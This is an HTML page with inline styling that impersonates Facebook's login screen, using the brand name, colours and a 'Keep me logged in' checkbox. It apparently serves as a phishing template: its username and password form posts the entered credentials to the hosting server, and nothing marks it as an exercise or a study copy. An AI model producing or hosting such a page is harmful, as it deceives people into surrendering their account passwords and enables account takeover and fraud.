<html>
  <head>
    <style>
      body {
        background-color: #DCE4EB;
        font-family: Segoe UI;
        margin: 0;
        padding: 0;
      }

      .top_box {
        color: white;
        font-size: 50px;
        background-color: #3b5998;
        width: 100%;
        height: 100px;
      }

      .sb {
        margin-top: 60px;
        margin-right: 700px;
        color: white;
        background-color: #0AB932;
        width: 65px;
        font-size: 11px;
        display: inline-block;
        height: 20px;
      }

      .mb {
        background-color: white;
        border: 1px solid white;
        width: 500px;
        height: 250px;
      }

      .iu {
        width: 200px;
        height: 30px;
      }

      .ip {
        width: 200px;
        height: 30px;
      }

      .submit_button {
        width: 200px;
        height: 35px;
        color: white;
        background-color: #3b5998;
        border: none;
      }
    </style>
  </head>

  <body>
    <center>
      <div class="top_box">
        <b>facebook</b>
        <div class="sb">
          Sign Up
        </div>
      </div><br><br><br><br><br><br>
      <div class="mb">
        <p>Log in to Facebook</p>
        <form action="/" method="POST">
          <input type="text" class="iu" name="username" required /><br><br>
          <input type="password" class="ip" name="password" required /><br><br>
          <input type="submit" class="submit_button" name="button" value="Log In" required /><br>
          <input type="checkbox" class="check_box" checked="checked" name="CheckBox" /><label>Keep me logged in</label>
        </form>
      </div>
    </center>
  </body>

</html>